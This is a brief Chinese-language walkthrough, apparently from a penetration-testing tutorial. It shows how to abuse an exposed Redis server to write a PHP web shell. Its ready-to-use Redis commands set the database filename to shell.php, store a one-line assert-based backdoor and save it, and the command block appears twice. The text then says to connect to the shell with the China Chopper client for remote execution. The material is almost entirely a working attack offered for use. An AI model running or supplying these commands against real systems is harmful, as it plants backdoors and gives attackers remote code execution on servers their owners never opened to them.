(1)在redis管理工具内写入木马并保存:
输入命令行:
config set dbfilename shell.php
set shell "<?php @assert($_POST[key]);?>"
save
(2)此时我们再使用菜刀工具进行连接
(3)木马直接就能成功被菜刀连接执行
config set dbfilename shell.php
set shell "<?php @assert($_POST[key]);?>"
save